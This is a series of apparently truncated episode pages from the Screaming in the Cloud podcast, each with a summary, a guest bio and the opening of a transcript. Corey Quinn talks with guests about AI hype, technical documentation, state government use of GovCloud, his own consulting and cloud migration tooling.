Joe Karlsson, Data Engineer at Tinybird, joins Corey on Screaming in the Cloud to discuss what it’s like working in the world of data right now and how he manages the overlap between his social media presence and career. Corey and Joe chat about the rise of AI and whether or not we’re truly seeing advancements in that realm or just trendy marketing plays, and Joe shares why he feels data is getting a lot more attention these days and what it’s like to work in data at this time. Joe also shares insights into how his mental health has been impacted by having a career and social media presence that overlaps, and what steps he’s taken to mitigate the negative impact. About JoeJoe Karlsson (He/They) is a Software Engineer turned Developer Advocate at Tinybird. He empowers developers to think creatively when building data intensive applications through demos, blogs, videos, or whatever else developers need.Joe's career has taken him from building out database best practices and demos for MongoDB, architecting and building one of the largest eCommerce websites in North America at Best Buy, and teaching at one of the most highly-rated software development boot camps on Earth. Joe is also a TEDx Speaker, film buff, and avid TikToker and Tweeter.Links Referenced: Tinybird: Personal website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn and I am joined today by someone from well, we’ll call it the other side of the tracks, if I can—Joe: [laugh].Corey: —be blunt and disrespectful. Joe Karlsson is a data engineer at Tinybird, but I really got to know who he is by consistently seeing his content injected almost against my will over on the TikToks. Joe, how are you?Joe: I’m doing so well and I’m so sorry for anything I’ve forced down your throat online. Thanks for having me, though.Corey: Oh, it’s always a pleasure to talk to you. No, the problem I’ve got with it is that when I’m in TikTok mode, I don’t want to think about computers anymore. I want to find inane content that I can just swipe six hours away without realizing it because that’s how I roll.Joe: TikTok is too smart, though. I think it knows that you are doing a lot of stuff with computers and even if you keep swiping away, it’s going to keep serving it up to you.Corey: For a long time, it had me pinned as a lesbian, which was interesting. Which I suppose—Joe: [laugh].
It happened to me, too.Corey: Makes sense because I follow a lot of women who are creators in comics and the rest, but I’m not interested in the thirst trap approach. So, it’s like, “Mmm, this codes as lesbian.” Then they started showing me ads for ADHD, which I thought was really weird until I’m—oh right. I’m on TikTok. And then they started recommending people that I’m surprised it was able to disambiguate until I realized these people have been at my house and using TikTok from my IP address, which probably is going to get someone murdered someday, but it’s probably easy to wind up doing an IP address match.Joe: I feel like I have to, like, separate what is me and what is TikTok, like, trying to serve it up because I’ve been on lesbian TikTok, too, ADHD, autism, like TikTok. And, like, is this who I am? I don’t know. [unintelligible 00:02:08] bring it to my therapist.Corey: You’re learning so much about yourself based upon an algorithm. Kind of wild, isn’t it?Joe: [laugh]. Yeah, I think we may be a little, like, neuro-spicy, but I think it might be a little overblown with what TikTok is trying to diagnose us with. So, it’s always good to just keep it in check, you know?Corey: Oh, yes. So, let’s see, what’s been going on lately? We had Google Next, which I think the industry largely is not taking seriously enough. For years, it felt like a try-hard, me too version of re:Invent. And this year, it really feels like it’s coming into its own. It is defining itself as something other than oh, us too.Joe: I totally agree. And that’s where you and I ran into each other recently, too. I feel like post-Covid I’m still, like, running into people I met on the internet in real life, and yeah, I feel like, yeah, re:Invent and Google Next are, like, the big ones.I totally agree. It feels like—I mean, it’s definitely, like, heavily inspired by it.
And it still feels like it’s a little sibling in some ways, but I do feel like it’s one of the best conferences I’ve been to since, like, a pre-Covid 2019 AWS re:Invent, just in terms of, like… who was there. The energy, the vibes, I feel like people were, like, having fun. Yeah, I don’t know, it was a great conference this year.Corey: Usually, I would go to Next in previous years because it was a great place to go to hang out with AWS customers. These days, it feels like it’s significantly more than that. It’s, everyone is using everything at large scale. I think that is something that is not fully understood. You talk to companies that are, like, Netflix, famously all in on AWS. Yeah, they have Google stuff, too.Everyone does. I have Google stuff. I have a few things in Azure, for God’s sake. It’s one of those areas where everything starts to diffuse throughout a company as soon as you hire employee number two. And that is, I think, the natural order of things. The challenge, of course, is the narrative people try and build around it.Joe: Yep. Oh, totally. Multi-cloud’s been huge for you know, like, starting to move up. And it’s impossible not to. It was interesting seeing, like, Google trying to differentiate itself from Azure and AWS. And, Corey, I feel like you’d probably agree with this, too, AI was like, definitely the big buzzword that kept trying to, like—Corey: Oh, God. Spare me. And I say that, as someone who likes AI, I think that there’s a lot of neat stuff lurking around and value hiding within generative AI, but the sheer amount of hype around it—and frankly—some of the crypto bros have gone crashing into the space, make me want to distance myself from it as far as humanly possible, just because otherwise, I feel like I get lumped in with that set. And I don’t want that.Joe: Yeah, I totally agree. 
I know it feels like it’s hard right now to, like, remain ungrifty, but, like, still, like—trying—I mean, everyone’s trying to just, like, hammer in an AI perspective into every product they have. And I feel like a lot of companies, like, still don’t really have a good use case for it. You’re still trying to, like, figure that out. We’re seeing some cool stuff.Honestly, the hard part for me was trying to differentiate between people just, like, bragging about OpenAI API addition they added to the core product or, like, an actual thing that’s, like, AI is at the center of what it actually does, you know what I mean? Everything felt like it’s kind of like tacked on some sort of AI perspective to it.Corey: One of the things that really is getting to me is that you have these big companies—Google and Amazon most notably—talk about how oh, well, we’ve actually been working with AI for decades. At this point, they keep trying to push out how long it’s been. It’s like, “Okay, then not for nothing, then why does”—in Amazon’s case—“why does Alexa suck? If you’ve been working on it for this long, why is it so bad at all the rest?” It feels like they’re trying to sprint out with a bunch of services that very clearly were not conceptualized until Chat-Gippity’s breakthrough.And now it’s oh, yeah, we’re there, too. Us, too. And they’re pivoting all the marketing around something that, frankly, they haven’t demonstrated excellence with. And I feel like they’re leaving a lot of their existing value proposition completely in the dust. It’s, your customers are not using you because of the speculative future, forward-looking AI things; it’s because you are able to solve business problems today in ways that are not highly speculative and are well understood. That’s not nothing and there needs to be more attention paid to that. And I feel like there’s this collective marketing tripping over itself to wrap itself in hype that does them no services.Joe: I totally agree. 
I feel like honestly, just, like, a marketing perspective, I feel like it’s distracting in a lot of ways. And I know it’s hot and it’s cool, but it’s like, I think it’s harder right now to, like, stay focused to what you’re actually doing well, as opposed to, like, trying to tack on some AI thing. And maybe that’s great. I don’t know.Maybe that’s—honestly, maybe you’re seeing some tractio
Jeff Geerling, Owner of Midwestern Mac, joins Corey on Screaming in the Cloud to discuss the importance of storytelling, problem-solving, and community in the world of cloud. Jeff shares how and why he creates content that can appeal to anybody, rather than focusing solely on the technical qualifications of his audience, and how that strategy has paid off for him. Corey and Jeff also discuss the impact of leading with storytelling as opposed to features in product launches, and what’s been going on in the Raspberry Pi space recently. Jeff also expresses the impact that community has on open-source companies, and reveals his take on the latest moves from Red Hat and Hashicorp. About JeffJeff is a father, author, developer, and maker. He is sometimes called "an inflammatory enigma".Links Referenced:Personal webpage: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. A bit off the beaten path of the usual cloud-focused content on this show, today I’m speaking with Jeff Geerling, YouTuber, author, content creator, enigma, and oh, so much more. Jeff, thanks for joining me.Jeff: Thanks for having me, Corey.Corey: So, it’s hard to figure out where you start versus where you stop, but I do know that as I’ve been exploring a lot of building up my own home lab stuff, suddenly you are right at the top of every Google search that I wind up conducting. I was building my own Kubernetes cluster on top of a Turing Pi 2, and sure enough, your teardown was the first thing that I found that, to be direct, was well-documented, and made it understandable.
And that’s not the first time this year that that’s happened to me. What do you do exactly?Jeff: I mean, I do everything. And I started off doing web design and then I figured that design is very, I don’t know, once it started transitioning to everything being JavaScript, that was not my cup of tea. So, I got into back-end work, databases, and then I realized to make that stuff work well, you got to know the infrastructure. So, I got into that stuff. And then I realized, like, my home lab is a great place to experiment on this, so I got into Raspberry Pis, low-power computing efficiency, building your own home lab, all that kind of stuff.So, all along the way, with everything I do, I always, like, document everything like crazy. That’s something my dad taught me. He’s an engineer in radio. And he actually hired me for my first job, he had me write an IT operations manual for the Radio Group in St. Louis. And from that point forward, that’s—I always start with documentation. So, I think that was probably what really triggered that whole series. It happens to me too; I search for something, I find my old articles or my own old projects on GitHub or blog posts because I just put everything out there.Corey: I was about to ask, years ago, I was advised by Scott Hanselman to—the third time I find myself explaining something, write a blog post about it because it’s easier to refer people back to that thing than it is for me to try and reconstruct it on the fly, and I’ll drop things here and there. And the trick is, of course, making sure it doesn't sound dismissive and like, “Oh, I wrote a thing. Go read.” Instead of having a conversation with people. But as a result, I’ll be Googling how to do things from time to time and come up with my own content as a result.It’s at least a half-step up from looking at forums and the rest, where I realized halfway through that I was the one asking the question. 
Like, “Oh, well, at least this is useful for someone.” And I, for better or worse, at least have a pattern of going back and answering how I solved a thing after I get there, just because otherwise, it’s someone asked the question ten years ago and never returns, like, how did you solve it? What did you do? It’s good to close that loop.Jeff: Yeah, and I think over 50% of what I do, I’ve done before. When you’re setting up a Kubernetes cluster, there’s certain parts of it that you’re going to do every time. So, whatever’s not automated or the tricky bits, I always document those things. Anything that is not in the readme, is not in the first few steps, because that will help me and will help others. I think that sometimes that’s the best success I’ve found on YouTube is also just sharing an experience.And I think that’s what separates some of the content that really drives growth on a YouTube channel or whatever, or for an organization doing it because you bring the experience, like, I’m a new person to this Home Assistant, for instance, which I use to automate things at my house. I had problems with it and I just shared those problems in my video, and that video has, you know, hundreds of thousands of views. Whereas these other people who know way more than I could ever know about Home Assistant, they’re pulling in fewer views because they just get into a tutorial and don’t have that perspective of a beginner or somebody that runs into an issue and how do you solve that issue.So, like I said, I mean, I just always share that stuff. Every time that I have an issue with anything technological, I put it on GitHub somewhere. And then eventually, if it’s something that I can really formulate into an outline of what I did, I put a blog post up on my blog. 
I still, even though I write I don’t know how many words per week that goes into my YouTube videos or into my books or anything, I still write two or three blog posts a week that are often pretty heavy into technical detail.Corey: One of the challenges I’ve always had is figuring out who exactly I’m storytelling for when I’m putting something out there. Because there’s a plethora, at least in cloud, of beginner content of, here’s how to think about cloud, here’s what the service does, here’s why you should use it et cetera, et cetera. And that’s all well and good, but often the things that I’m focusing on presuppose a certain baseline level of knowledge that you should have going into this. If you’re trying to figure out the best way to get some service configured, I probably shouldn’t have to spend the first half of the article talking about what AWS is, as a for instance. And I think that inherently limits the size of the potential audience that would be interested in the content, but it’s also the kind of stuff that I wish was out there.Jeff: Yeah. There’s two sides to that, too. One is, you can make content that appeals to anybody, even if they have no clue what you’re talking about, or you can make content that appeals to the narrow audience that knows the base level of understanding you need. So, a lot of times with—especially on my YouTube channel, I’ll put things in that is just irrelevant to 99% of the population, but I get so many comments, like, “I have no clue what you said or what you’re doing, but this looks really cool.” Like, “This is fun or interesting.” Just because, again, it’s bringing that story into it.Because really, I think on a base level, a lot of programmers especially don’t understand—and infrastructure engineers are off the deep end on this—they don’t understand the interpersonal nature of what makes something good or not, what makes something relatable. 
And trying to bring that into technical documentation a lot of times is what differentiates a project. So, one of the products I love and use and recommend everywhere and have a book on—a best-selling book—is Ansible. And one of the things that brought me into it and has brought so many people is the documentation started—it’s gotten a little bit more complex over the years—but it started out as, “Here’s some problems. Here’s how you solve them.”Here’s, you know, things that we all run into, like how do you connect to 12 servers at the same time? How do you have groups of servers? Like, it showed you all these little examples. And then if you wanted to go deeper, there was more documentation linked out of that. But it was giving you real-world scenarios and doing it in a simple way. And it used some little easter eggs and fun things that made it more interesting, but I think that that’s missing from a lot of technical discussion and a lot of technical documentation out there is that playfulness, that human side, the get from Point A to Point B and here’s why and here’s how, but here’s a little interesting way to do it instead of just here’s how it’s done.Corey: In that same era, I was one of the very early developers behind SaltStack, and I think one of the reasons that Ansible won in the market was that when you started looking into SaltStack, it got wrapped around its own axle talking about how it uses ZeroMQ for a full mesh between all of the systems there, as long—sorry [unintelligible 00:07:39] mesh network that all routes—not really a mesh network at all—it talks through a single controller that then talks to all of its subordinate nodes. Great. That’s awesome. How do I use this to install a web server, is the question that people had. And it was so in love with its own cleverness in some ways. 
Ansible was always much more approachable in that respect and I can’t overstate just how valuable that was for someone who just wants to get the problem solved.Jeff: Yeah. I also looked at something like NixOS. It’s kind of like the Arch Linux of distributions—Corey: You must be at least this smart to use it in some respects—Jeff: Yeah, it’s—Corey: —has been the tone of every bit of documentation I’ve had with that.Jeff: [laugh]. There’s, like, this level of pride in what it does, that doesn’t get to ‘and it solves this problem.’ You can get there, but you have to work through the ba
Dmitry Kagansky, State CTO and Deputy Executive Director for the Georgia Technology Authority, joins Corey on Screaming in the Cloud to discuss how he became the CTO for his home state and the nuances of working in the public sector. Dmitry describes his focus on security and reliability, and why they are both equally important when working with state government agencies. Corey and Dmitry describe AWS’s infamous GovCloud, and Dmitry explains why he’s employing a multi-cloud strategy but that it doesn’t work for all government agencies. Dmitry also talks about how he’s focusing on hiring and training for skills, and the collaborative approach he’s taking to working with various state agencies.About DmitryMr. Kagansky joined GTA in 2021 from Amazon Web Services where he worked for over four years helping state agencies across the country in their cloud implementations and migrations.Prior to his time with AWS, he served as Executive Vice President of Development for Star2Star Communications, a cloud-based unified communications company. Previously, Mr. Kagansky was in many technical and leadership roles for different software vending companies. Most notably, he was Federal Chief Technology Officer for Quest Software, spending several years in Europe working with commercial and government customers.Mr. Kagansky holds a BBA in finance from Hofstra University and an MBA in management of information systems and operations management from the University of Georgia.Links Referenced: Twitter: LinkedIn: GTA Website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. 
This is Screaming in the Cloud.Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit to learn more. That's thanks as well to Sysdig for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Technical debt is one of those fun things that everyone gets to deal with, on some level. Today’s guest apparently gets to deal with 235 years of technical debt. Dmitry Kagansky is the CTO of the state of Georgia. Dmitry, thank you for joining me.Dmitry: Corey, thank you very much for having me.Corey: So, I want to just begin here because this has caused confusion in my life; I can only imagine how much it’s caused for you folks. We’re talking Georgia the US state, not Georgia, the sovereign country?Dmitry: Yep. Exactly.Corey: Excellent. It’s always good to triple-check those things because otherwise, I feel like the shipping costs are going to skyrocket in one way or the other. So, you have been doing a lot of very interesting things in the course of your career. You’re former AWS, for example, you come from commercial life working in industry, and now it’s yeah, I’m going to go work in state government. How did this happen?Dmitry: Yeah, I’ve actually been working with governments for quite a long time, both here and abroad. So, way back when, I’ve been federal CTO for software companies, I’ve done other work. And then even with AWS, I was working with state and local governments for about four, four-and-a-half years. But came to Georgia when the opportunity presented itself, really to try and make a difference in my own home state. 
You mentioned technical debt at the beginning and it’s one of the things I’m hoping to help the state pay down and get rid of some of it.Corey: It’s fun because governments obviously are not thought of historically as being the early adopters, bleeding edge when it comes to technical innovation. And from where I sit, for good reason. You don’t want code that got written late last night and shoved into production to control things like municipal infrastructure, for example. That stuff matters. Unlike a lot of other walks of life, you don’t usually get to choose your government, and, “Oh, I don’t like this one so I’m going to go for option B.”I mean, you get to do that at the ballot box, but that takes significant amounts of time. So, people want above all else—I suspect—their state services from an IT perspective to be stable, first and foremost. Does that align with how you think about these things? I mean, security, obviously, is a factor in that as well, but how do you see, I guess, the primary mandate of what you do?Dmitry: Yeah. I mean, security is obviously up there, but just as important is that reliance on reliability, right? People take time off of work to get driver’s licenses, right, they go to different government agencies to get work done in the middle of their workday, and we’ve got to have systems available to them. We can’t have them show up and say, “Yeah, come back in an hour because some system is rebooting.” And that’s one of the things that we’re trying to fix and trying to have fewer of, right?There’s always going to be things that happen, but we’re trying to really cut down the impact. One of the biggest things that we’re doing is obviously a move to the cloud, but also segmenting out all of our agency applications so that agencies manage them separately.
Today, my organization, Georgia Technology Authority—you’ll hear me say GTA—we run what we call NADC, the North Atlanta Data Center, a pretty large-scale data center, lots of different agencies, app servers all sitting there running. And then a lot of times, you know, an impact to one could have an impact to many. And so, with the cloud, we get some partitioning and some segmentation where even if there is an outage—a term you’ll often hear used that we can cut down on the blast radius, right, that we can limit the impact so that we affect the fewest number of constituents.Corey: So, I have to ask this question, and I understand it’s loaded and people are going to have opinions with a capital O on it, but since you work for the state of Georgia, are you using GovCloud over in AWS-land?Dmitry: So… [sigh] we do have some footprint in GovCloud, but I actually spent time, even before coming to GTA, trying to talk agencies out of using it. I think there’s a big misconception, right? People say, “I’m government. They called it GovCloud. Surely I need to be there.”But back when I was with AWS, you know, I would point-blank tell people that really I know it’s called GovCloud, but it’s just a poorly named region. There are some federal requirements that it meets; it was built around the ITAR, which is International Traffic of Arms Regulations, but states aren’t in that business, right? They are dealing with HIPAA data, with various criminal justice data, and other things, but all of those things can run just fine on the commercial side. And truthfully, it’s cheaper and easier to run on the commercial side. And that’s one of the concerns I have is that if the commercial regions meet those requirements, is there a reason to go into GovCloud, just because you get some extra certifications? So, I still spend time trying to talk agencies out of going to GovCloud. 
Ultimately, the agencies with their apps make the choice of where they go, but we have been pretty good about reducing the footprint in GovCloud unless it’s absolutely necessary.Corey: Has this always been the case? Because my distant recollection around all of this has been that originally when GovCloud first came out, it was a lot harder to run a whole bunch of workloads in commercial regions. And it feels like the commercial regions have really stepped up as far as what compliance boxes they check. So, is this one of those stories where five or ten years ago, when GovCloud first came out, there were a bunch of reasons to use it that no longer apply?Dmitry: I actually can’t go past, I’ll say, seven or eight years, but certainly within the last eight years, there’s not been a reason for state and local governments to use it. At the federal level, that’s a different discussion, but for most governments that I worked with and work with now, the commercial regions have been just fine. They’ve met the compliance requirements, controls, and everything that’s in place without having to go to the GovCloud region.Corey: Something I noticed that was strange to me about the whole GovCloud approach when I was at the most recent public sector summit that AWS threw is whenever I was talking to folks from AWS about GovCloud and adopting it and launching new workloads and the rest, unlike in almost any other scenario, it seemed that their first response—almost a knee-jerk reflex—was to pass that work off to one of their partners. Now, on the commercial side, AWS will do that when it makes sense, and each one becomes a bit of a judgment call, but it just seemed like every time someone’s doing something with GovCloud, “Oh, talk to Company X or Company Y.” And it wasn’t just one or two companies; there were a bunch of them. Why is that?Dmitry: I think a lot of that is because of the limitations within GovCloud, right?
So, when you look at anything that AWS rolls out, it almost always rolls out into either us-east-1 or us-west-2, right, one of those two regions, and it goes out worldwide. And then it comes out in GovCloud months, sometimes even years later. And in fact, sometimes there are features that never show up in GovCloud. So, there’s not parity there, and I think what happens is, it’s these partners that know what limitations GovCloud has and what things are missing in GovCloud that they still have to work around.Like, I remember when I started with AWS back in 2016
In this special live-recorded episode of Screaming in the Cloud, Corey interviews himself— well, kind of. Corey hosts an AMA session, answering both live and previously submitted questions from his listeners. Throughout this episode, Corey discusses misconceptions about his public persona, the nature of consulting on AWS bills, why he focuses so heavily on AWS offerings, his favorite breakfast foods, and much, much more. Corey shares insights into how he monetizes his public persona without selling out his genuine opinions on the products he advertises, his favorite and least favorite AWS services, and some tips and tricks to get the most out of re:Invent.About CoreyCorey is the Chief Cloud Economist at The Duckbill Group. Corey’s unique brand of snark combines with a deep understanding of AWS’s offerings, unlocking a level of insight that’s both penetrating and hilarious. He lives in San Francisco with his spouse and daughters.Links Referenced: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: As businesses consider automation to help build and manage their hybrid cloud infrastructures, deployment speed is important, but so is cost. Red Hat Ansible Automation Platform is available in the AWS Marketplace to help you meet your cloud spend commitments while delivering best-of-both-worlds support.Corey: Well, all right. Thank you all for coming. Let’s begin and see how this whole thing shakes out, which is fun and exciting, and for some godforsaken reason the lights like to turn off, so we’re going to see if that continues. 
I’ve been doing Screaming in the Cloud for about, give or take, 500 episodes now, which is more than a little bit ridiculous. And I figured it would be a nice change of pace if I could, instead of reaching out and talking to folks who are innovative leaders in the space and whatnot, if I could instead interview my own favorite guest: myself.Because the entire point is, I’m usually the one sitting here asking questions, so I’m instead going to now gather questions from you folks—and feel free to drop some of them into the comments—but I’ve solicited a bunch of them, I’m going to work through them and see what you folks want to know about me. I generally try to be fairly transparent, but let’s have fun with it. To be clear, if this is your first exposure to my Screaming in the Cloud podcast show, it’s generally an interview show talking with people involved with the business of cloud. It’s not intended to be snarky because not everyone enjoys thinking on their feet quite like that, but rather a conversation of people about what they’re passionate about. I’m passionate about the sound of my own voice. That’s the theme of this entire episode.So, there are a few that have come through that are in no particular order. I’m going to wind up powering through them, and again, throw some into the comments if you want to have other ones added. If you’re listening to this in the usual Screaming in the Cloud place, well, send me questions and I am thrilled to wind up passing out more of them. The first one—a great one to start—comes with someone asked me a question about the video feed. “What’s with the Minecraft pickaxe on the wall?” It’s made out of foam.One of my favorite stories, and despite having a bunch of stuff on my wall that is interesting and is stuff that I’ve created, years ago, I wrote a blog post talking about how machine learning is effectively selling digital pickaxes into a gold rush. 
Because the cloud companies pushing it are all selling things such as, you know, they’re taking expensive compute, large amounts of storage, and charging by the hour for it. And in response, Amanda, who runs machine learning analyst relations at AWS, sent me that by way of retaliation. And it remains one of my absolute favorite gifts. It’s, where’s all this creativity in the machine-learning marketing? No, instead it’s, “We built a robot that can think. But what are we going to do with it now? Microsoft Excel.” Come up with some of that creativity, that energy, and put it into the marketing side of the world.Okay, someone else asks—Brooke asks, “What do I think is people’s biggest misconception about me?” That’s a good one. I think part of it has been my misconception for a long time about what the audience is. When I started doing this, the only people who ever wound up asking me anything or talking to me about anything on social media already knew who I was, so I didn’t feel the need to explain who I am and what I do. So, people sometimes only see the witty banter on Twitter and whatnot and think that I’m just here to make fun of things.They don’t notice, for example, that my jokes are never calling out individual people, unless they’re basically a US senator, and they’re not there to make individual humans feel bad about collectively poor corporate decision-making. I would say across the board, people think that I’m trying to be meaner than I am. I’m going to be honest and say it’s a little bit insulting, just from the perspective of, if I really had an axe to grind against people who work at Amazon, for example, is this the best I’d be able to do? I’d like to think that I could at least smack a little bit harder. Speaking of, we do have a question that people sent in in advance.“When was the last time that Mike Julian gave me that look?” Easy. It would have been two days ago because we were both in the same room up in Seattle. 
I made a ridiculous pun, and he just stared at me. I don’t remember what the pun was, but I am an incorrigible punster and, as a result, Mike has learned that whatever he does when I make a pun, he cannot incorrige me. Buh-dum-tss. That’s right. They’re no longer puns, they’re dad jokes. A pun becomes a dad joke once the punch line becomes a parent. Yes.

Okay, the next one: what is my favorite AWS joke? The easy answer is something cynical and ridiculous, but that’s just punching down at various service teams; it’s not my goal. My personal favorite is the genie joke, where a guy rubs a lamp, a genie comes out and says, “You can have a billion dollars if you can spend $100 million in a month, and you’re not allowed to waste it or give it away.” And the person says, “Okay”—like, “Those are the rules.” Like, “Okay. Can I use AWS?” And the genie says, “Well, okay, there’s one more rule.” I think that’s kind of fun.

Let’s see, another one. A hardball question: given the emphasis on right-sizing for meager cost savings and the amount of engineering work required to make real architectural changes to get costs down, how do you approach cost controls in companies largely running other people’s software? There are not as many companies as you might think where dialing in the specifics of a given application across the board is going to result in meaningful savings. Yes, if you’re running something at hyperscale, it makes an awful lot of sense, but most workloads don’t do that. The mistakes you most often see are misconfigurations from not knowing some arcane bit of AWS trivia, as a good example. There are often things you can do with relatively small amounts of effort. Beyond a certain point, things are going to cost what they’re going to cost without a massive rearchitecture, and I don’t advise people do that, because no one is going to be happy rearchitecting just for cost reasons.
Doesn’t go well.

Someone asks, “I’m quite critical of AWS, which does build trust with the audience. Has AWS tried to get you to market some of their services, and would I be open to do that?” That’s a great question. Yes, sometimes they do. You can tell this because they wind up buying ads in the newsletter or the podcast, and they’re all disclaimed as a sponsored piece of content.

I do have an analyst arrangement with a couple of different cloud companies, as mentioned, and the reason behind that is because you can buy my attention to look at your product and talk to you in-depth about it, but you cannot buy my opinion on it. And those engagements are always tied to, let’s talk about what the public is seeing about this. Now, sometimes I write about the things that I’m talking about because that’s where my mind goes, but it’s not about, okay, now go and talk about this because we’re paying you to, and don’t disclose that you have a financial relationship.

No, that is called fraud. I figure I can sell you as an audience out exactly once, so I’d better be able to charge enough money to never have to work again. Like, when you see me suddenly talk about multi-cloud being great and I become a VP at IBM, about three to six months after that, no one will ever hear from me again, because I love nesting-doll yacht money. It’ll be great.

Let’s see. The next one I have on my prepared list here is, “Tell me about a time I got AWS to create a pie chart.” I wish I’d see less of it. Every once in a while I’ll talk to a team and they’re like, “Well, we’ve prepared a PowerPoint deck to show you what we’re talking about.” No. Amazon is famously not a PowerPoint company, and I don’t know why people feel the need to repeatedly prove that point to me, because slides are not always the best way to convey complex information.

I prefer to read documents and then have a conversation about them, as Amazon tends to do. The visual approach and the bullet lists and all the rest are just frustrating.
If I’m going to do a pie chart, it’s going to be in service of a joke. It’s not going to be anything that is the best way to convey information in almost any sense.

“How many int
David Colebatch, CEO of Tidal, joins Corey on Screaming in the Cloud to discuss Tidal’s recent shift to a product-led approach and why empathizing with customers is always their most important job. David describes what it was like to grow the company from scratch on a bootstrapped basis, and how customer feedback and challenges inform the company strategy. Corey and David discuss the cost-savings measures cloud customers are now embarking on, and David discusses how constant migrations are the new normal. Corey and David also discuss the impact that generative AI is having not just on tech, but also on creative content and interactions in our everyday lives.

About David
David is the CEO & Founder of Tidal. Tidal is empowering businesses to transform from traditional on-premises, IT-run organizations to lean, agile, cloud-powered machines.

Links Referenced:
Company website:
LinkedIn:

Transcript
Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Returning guest today, David Colebatch is still the CEO at Tidal. David, how have you been? It’s been a hot second.

David: Thanks, Corey. Yeah, it’s been a fantastic summer for me up here in Toronto.

Corey: Yeah, last time I saw you, was it New York or was it DC? They all start to run together for me.

David: I think it was DC. Yeah.

Corey: That’s right. Public Sector Summit, where everything was just a little bit stranger than most of my conversations. It’s, “Wait, you’re telling me there’s a whole bunch of people who use the cloud but don’t really care about money?
What—how does that work?” And I say that not from the position of harsh capitalism, but from the position of, we’re a government; saving costs is nowhere in our mandate. Or it is, but it’s way above my pay grade, and I run the cloud and call it good. It seems like that attitude is evolving, but slowly, which is kind of what you want to see. Titanic shifts in governing are usually not something you want to see done on a whim, overnight.

David: No, absolutely. A lot of the excitement at the DC Summit was around new capabilities. And I was actually really intrigued. It was my first time at the DC Summit, and it was packed from the very early stages of the morning, with great attendance throughout the day. And I was just really impressed by some of the new capabilities that customers are leveraging now and the new use cases that they’re bringing to market. So, that was a good time for me.

Corey: Yeah. So originally, you folks were focused primarily on migrations, and it seems like that’s evolving a little bit. You have a product now, for starters, and the company’s name is simply Tidal, without a second word. So, brevity is very much the soul of wit, it would seem. What are you doing these days?

David: Absolutely. Yeah, you can find us at Yeah, we’re focused on migrations as a primary means to help a customer achieve new capabilities. We’re about accelerating their journey to cloud and optimizing once they’re in cloud as well. Yeah, we’re focused on identifying the different personas in an enterprise that are trying to take that cloud journey on, people like project and program managers, developers, as well as network people, now.

Corey: It seems, on some level, like you are falling victim to the classic trap that basically all of us do, where you have a services company—which is how I thought of you folks originally—now, on some level, trying to become a product or a platform company. And then you have, on the other side of it, places that were, “Oh, we’re a SaaS company.
This is hard. We’re going to do services instead.” And it seems like no one’s happy. We’re all cats, perpetually on the wrong side of a given door. Is that an accurate assessment for where you are? Or am I misreading the tea leaves on this one?

David: A little misread, but close—

Corey: Excellent.

David: You’re right. We bootstrapped our product company with services. And from day one, we supported our customers, as well as channel partners, many of the [larger size 00:03:20] that you know; we supported them in helping their customers be successful. And that was necessary for us as we bootstrapped the company from zero. But lately, and certainly in the last 12 months, it’s very much a product-led company. So, leading with what customers are using our software for first, and then supporting that with our customer success team.

Corey: So, it’s been an interesting year. We’ve seen simultaneously a market correction, which I think has been sorely needed for a while, but that’s almost been overshadowed in a lot of conversations I’ve had by the meteoric rise and hype around generative AI. Have you folks started rebranding everything with a fresh coat of paint labeled generative AI yet, as it seems like so many folks have? What’s your take on it?

David: We haven’t. You won’t see a from us. Look, our thoughts are on leveraging the technology as we always have to provide better recommendations and suggestions to our users, so we’ll continue to embrace generative AI as it applies to specific use cases within our product. We’re not going to launch a brand-new product just around the AI theme.

Corey: Yeah, but even that seems preferable to what a lot of folks are doing, which is suddenly pivoting their entire market positioning and then acting like, “Oh, we’ve been working in generative AI for 5, 10, 15 years,” in some cases. Google and Amazon most notably have talked about how they’ve been doing this for decades. It’s, “Cool.
Then why did OpenAI beat you all to the punch on this?” And in many cases, also, “You’ve been working on this for decades? Huh. Then why is Alexa so terrible?” And they don’t really have a good talking point for that yet, but it’s the truth.

David: Absolutely. Yeah. I will say that the world changed with the OpenAI launch, of course, and we had a new way to interact with this technology now that just sparked so much interest from everyday people, not just developers. And so, that got our juices flowing in creativity mode as well. And so, we started thinking about, well, how can we recommend more to other users of our system, as opposed to just cloud architects? You know, how can we support project managers that are, you know, trying to summarize where they’re at, by leveraging some of this technology? And I’m not going to say we have all the answers for this baked yet, but it’s certainly very exciting to start thinking outside the box with a whole new bunch of capabilities that are available to us.

Corey: I tried doing some architecture work with Chat-Gippity—yes, that is how I pronounce it—and it has led me down the primrose path a little bit, because what it says is often right. Mostly. But there are some edge-case exceptions of, “Ohh, it doesn’t quite work that way.” It reminds me, at some level, of a junior engineer who doesn’t know the answer, so they bluff. And that’s great, but it’s also a disaster.

